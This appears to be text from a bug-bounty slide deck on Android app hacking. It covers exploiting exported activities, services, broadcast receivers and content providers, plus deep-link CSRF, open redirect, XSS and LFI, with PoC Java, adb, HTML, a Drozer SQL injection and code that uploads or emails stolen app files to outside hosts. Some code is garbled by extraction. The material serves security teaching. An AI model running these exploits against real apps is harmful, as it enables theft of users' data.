Android Hacking

By Kyle B3nac
@b3nac
 Overview

Android Workflow Exported Android Components Deep Link Exploitation

- Android Workflow - Android Intents - Host validation, scheme validation

- Android Recon - User Input - Exploiting Deeplinks
- Api Key Recon - Webviews - Deep link LFIs
- Reverse engineering apis - How to exploit components - Android public directories
- Android application directories
Android Workflow
Android Studio - PoC development, Emulators, Check for debugging info

Jadx - Decompile apks and source code review

Adb - (Android Debug Bridge)

Objection - Patching apks without rooted device

Drozer - Map out attack surface, useful functions

DB Browser for SQLite - View what is stored in SQLite databases

Burp Suite - After patching apk, installing cert on device

Custom Bash scripts - Automate the redundant tasks

Cell Phones - Galaxy S10e, test phone J3 Orbit, Android Studio emulator
Android Recon

- AndroidManifest.xml (basically a blueprint for the application)

Find exported components, api keys, custom deep link schemas, schema endpoints etc.

- resources.arsc/strings.xml

Developers are encouraged to store strings in this file instead of hard coding in application.

- res/xml/file_paths.xml

Shows file save paths.

- Search source code recursively

Especially BuildConfig files.

API Key Recon
Always verify if the key is read or read/write with api documentation examples.

- Higher impact - Higher payout - Definite triage

Solving the api key puzzle

- String references in Android Classes

getString(R.string.cmVzb3VyY2VzX3lv)
cmVzb3VyY2VzX3lv is the string resource label.

- Find these string references in strings.xml

<string name="cmVzb3VyY2VzX3lv">apikeyhere</string>

- Piece together the domains and required params in source code

Exported Android Components

- Activities - Entry points for application interactions of components specified in AndroidManifest.xml.

Has several states managed by callbacks such as onCreate().

- Service - Supplies additional functionality in the background.

- Broadcast receivers - Receives broadcasts from events of interest. Usually specified broadcasted
intents in the broadcast receiver activity.

- Content providers - Helps applications manage access to stored data and ways to share data with
other Android applications.
How to Exploit Android Activities

- Access to protected intents via exported Activities

One exported activity that accepts a user provided intent can expose protected intents.

- Access to sensitive data via exported Activity

Often combined with deep links to steal data via unvalidated parameters. Write session tokens to an
external file.

- Access to sensitive files, stealing files, replacing imported files via exported Activities

external-files-path, external-path

Public app directories

 Access to Protected Intents via Exported Activities

private void exampleVulnerableMethod(Intent intent) {

Intent vulndeeplinkIntent = (Intent)

intent.getParcelableExtra ("attacker_provided_data" );

// if deeplink does not equal null startActivity with intent provided by user

if (!(deeplinkIntent == null || this.consumedDeeplinkIntent )) {

startActivity (deeplinkIntent ); // starting an intent provided by a user

}
Exploitation of Android Services
Custom file upload service example that is vulnerable because android:exported="true". When exported by third party
applications can send data to the service or steal sensitive data from applications depending on the services function. Check
if params and intent data can be set with proof of concept application.

UploadTaskParameters params = new UploadTaskParameters();

params.setId("1");
);
params.setServerUrl("https://your-server-receives-app-data.com"
try {
));
params.addFile(new UploadFile("/data/data/com.example/database/ohno.db"

}
catch(FileNotFoundException e) {
throw new IllegalStateException(e); //Here to satisfy try catch requirement
}

Intent intent = new Intent("com.example.action.upload");

intent.setClassName("com.example", "com.example.UploadService");
intent.putExtra("httpTaskParameters", new HttpUploadTaskParameters());
startService(intent);
Exploitation of Android Broadcast Receivers
Vulnerable when receiver is exported and accepts user provided broadcasts.

String totally = paramIntent.getStringExtra("totally");

String secure = paramIntent.getStringExtra("secure")

ADB PoC

adb shell am broadcast -a action com.b3nac.injuredandroid.intent.action.CUSTOM_INTENT --es totally

"test" --es secure "test"

Java PoC

private void send() {

String totally = "test";
String secure = "test";
// Create intent, set to matching action, send exploit broadcast
Intent intent = new Intent(getApplicationContext(), FlagFiveReceiver.class);
intent.setAction("com.b3nac.injuredandroid.intent.action.CUSTOM_INTENT");
intent.putExtra("totally", totally);
intent.putExtra("secure", secure);
sendBroadcast(intent);
}
Exploitation of Android Content Providers
Content providers that connect to sqlite can be exploited via SQL injection by third party apps.

adb shell content query --uri <URI> [--user <USER_ID>] [--projection <PROJECTION>] [--where <WHERE>] [--sort
<SORT_ORDER>]

With Drozer to make it easier.

dz> run app.provider.query content://app.test/ --projection "*FROM SQLITE MASTER WHERE type='table';--"

Upload content providers that only verify class names can be exploited to use third party activities that
have the same name “com.app.spoofedactivity”. This is possible because
android:grantUriPermissions="true" and the boolean being used.

public static boolean checkOnlyClassName(Intent intent) {

ComponentName component = intent.getComponent();
String class = component.getClassName();
If (class.equals(classInAcceptedList)) {
//Allow access
return true;
}
What is a Deep Link?
“In Android, a deep link is a link that takes you directly to a specific destination within an app.”

- Think of deep links as Android urls to specific parts of the application.

- Usually mirrors web application except with a different schema that navigate directory to specific Android activities.

“Secure” implementation of a deeplink schema.

<data android:scheme="flag11" data android:host="dashboard" data android:scheme="/user"/>

The deep link would have to match this exactly to be flag11://dashboard/user

Verified deep links can only use http and https schemas. Sometimes developers keep custom schemas for testing new
features.
Exploitation of Deep Links
Type of vulnerabilities are based on how the scheme://, host://, and parameters are validated

<activity android:theme="@style/AppTheme" android:label="@string/title_activity_deep_link"

android:name=".DeepLinkActivity">
<intent-filter>
<action android:name="android.intent.action.VIEW"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<data android:scheme="flag11"/>
</intent-filter>
</activity>

CSRF - Test when autoVerify=”true” is not present in AndroidManifest.xml It’s easier.

Open redirect - Test when custom schemes do not verify endpoint parameters or hosts

XSS - Test when endpoint parameters or host not validated, addJavaScriptInterface and
setJavascriptEnabled(true); is used.

LFI - Test when deep link parameters aren’t validated. appschema://app/goto?file=

Deep Link CSRF
Deep links take the user directly to a specific part of the Android application.

Developers sometimes use deep links as a shortcut that will modify data or automatically execute an action
such as downloading a file. CSRF takes place with “state changing deep links.”

All deep links are GET requests and should be verified with autoVerify=true. Verified deep links also check
Android application origin based on sha256_cert_fingerprints.

https://domain.name/.well-known/assetlinks.json

<intent-filter android:autoVerify="true">
<action android:name="android.intent.action.VIEW" />
<category android:name="android.intent.category.DEFAULT" />
<category android:name="android.intent.category.BROWSABLE" />
<data android:scheme="https" android:host="www.example.com" />
<data android:scheme="https" android:host="mobile.example.com" />
</intent-filter>
Deep Link CSRF Examples
Find a deeplink that automates an action without a user prompt, chances are the user has already granted permissions for all
application actions.

For example a deep link that automatically downloads a sensitive file to a public directory guarantees a malware application
can steal that file.

Java
Request deeplink.

Then steal file with Intent.ACTION_SENDTO and Intent.EXTRA_STREAM from public directory for proof of concept.
Deep Link Open Redirects
Schema in an intent-filter only specified with a scheme in AndroidManifest.xml

<intent-filter>
<action android:name="android.intent.action.VIEW"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<data android:scheme="flag11"/>
</intent-filter>

- Further investigate Activity class in this case “DeepLinkActivity”.

- Activity validation that only requires a specific protocol.

Custom schema may be converted to match web application protocol

val intentToUri = getIntent()

val data = intentToUri.data
val appSchema = "flag11" == data.getScheme()

if (appSchema) {

val convertScheme = "https://" + data.host

startActivity(Intent(Intent.ACTION_VIEW, Uri.parse(
convertScheme)))
}
Deep Link Open Redirect Example

Proof of concept with html

<html>
<a href="flag11://google.com">Open Redirect PoC</a>
</html>

Proof of concept with ADB

adb shell am start -W -a android.intent.action.VIEW -d "flag11://google.com"
Deep Link XSS
Possible if schema, host, and url parameters aren’t validated.

- Some cases javascript:alert(“PoC”); will work if any schema is accepted

Look for addJavascriptInterface and setJavaScriptEnabled(true);

Android doesn’t enable javascript by default. When a mobile application needs to interact with a Web
application this is where javascript is sometimes enabled for compatibility with WebViews.

//Defined Webview

WebView flagWebView = new WebView(this);

setContentView(flagWebView);
flagWebView.getSettings().setJavaScriptEnabled(true);
flagWebView.setWebChromeClient(new WebChromeClient());

//User supplied data

flagWebView.loadUrl(getIntent().getStringExtra("totally_secure"));
Deep Link XSS Example
Proof of concept with Java
Uri uri = Uri.parse("appschema://<svg onload=alert(1)>");
Intent startDownloadIntent = new Intent(Intent.ACTION_VIEW, uri);
startActivity(startDownloadIntent);

Proof of concept with html page

<html>
<a href="appschema://<svg onload=alert(1)>">XSS PoC</a>
</html>
Deep Link LFIs
Try on custom schemes and verified scheme parameters.

Verified schemes such as http:// and https:// might lookup server files from the mobile application
depending on implementation.

See where the application is saving account data in res/xml/file_paths.xml

There’s two keywords for externally saved files “external-files-path” and “external-path”. APP_DATA in the
example above is what the file directory name would be in a publically accessible app directory.
Files Stored in Public Directories
“Use the directories within internal storage to save sensitive information that other apps shouldn't access.”

- All applications can access those files on the mobile device

- Deep links can be used to exfiltrate specific files

- Files can be uploaded via streaming intents

private void sendToEmail(String folder_name, String file_name) {

try {
Intent intent = new Intent(Intent.ACTION_SENDTO);
intent.setType("text/plain");
intent.putExtra(Intent.EXTRA_SUBJECT, "Subject");
intent.putExtra(Intent.EXTRA_STREAM, Uri.parse( f"ile:///" + folder_name + file_name));
intent.setData(Uri.parse("mailto:[email protected]"));
intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
startActivity(intent);
} catch(Exception e) {
System.out.println("Email did not send because " + e);
}
}
Public Android Directories

Environment.getExternalStorageDirectory() /storage/sdcard0
Environment.getExternalStoragePublicDirectory(DIRECTORY_ALARMS) /storage/sdcard0/Alarms
Environment.getExternalStoragePublicDirectory(DIRECTORY_DCIM) /storage/sdcard0/DCIM
Environment.getExternalStoragePublicDirectory(DIRECTORY_DOWNLOADS) /storage/sdcard0/Download
Environment.getExternalStoragePublicDirectory(DIRECTORY_MOVIES) /storage/sdcard0/Movies
Environment.getExternalStoragePublicDirectory(DIRECTORY_MUSIC) /storage/sdcard0/Music
Environment.getExternalStoragePublicDirectory(DIRECTORY_NOTIFICATIONS) /storage/sdcard0/Notifications
Environment.getExternalStoragePublicDirectory(DIRECTORY_PICTURES) /storage/sdcard0/Pictures
Environment.getExternalStoragePublicDirectory(DIRECTORY_PODCASTS) /storage/sdcard0/Podcasts
Environment.getExternalStoragePublicDirectory(DIRECTORY_RINGTONES) /storage/sdcard0/Ringtones

Application directories that can be accessed with read/write granted permissions then it’s basically public

/sdcard/Android/data/com.example/appdata/example.pdf
 Deep Link LFI Example
Proof of concept with Java
private static void searchFolderRecursive (File folder ) {
if (folder != null) {
if (folder .listFiles () != null) {
for (File file : folder .listFiles ()) {
if (file.isFile ()) {
if(file.getName ().contains (".pdf" )){
Uri uri = Uri.parse("appschema://dashboard/goto?file=/sdcard/Android/data/com.example/appdirectory/" +
file.getName ());
Intent intent = new Intent (Intent .ACTION_VIEW , uri);
startActivity (intent );
Log.v("Got a file!" , "File = " + file.getName ());
}
} else {
searchFolderRecursive (file);
}
}
}
}
}

Proof of concept with html

<html>
<a href=”appschema://dashboard/goto?file=/sdcard/Android/data/com.example/appdirectory/test.pdf”>Test LFI</a>
</html>
Resources
Some examples based on:
https://hackerone.com/reports/200427
https://hackerone.com/reports/258460
https://hackerone.com/reports/272044

Tool resources:
https://github.com/skylot/jadx
https://developer.android.com/studio/command-line/adb
https://github.com/sensepost/objection
https://github.com/FSecureLABS/drozer
https://sqlitebrowser.org/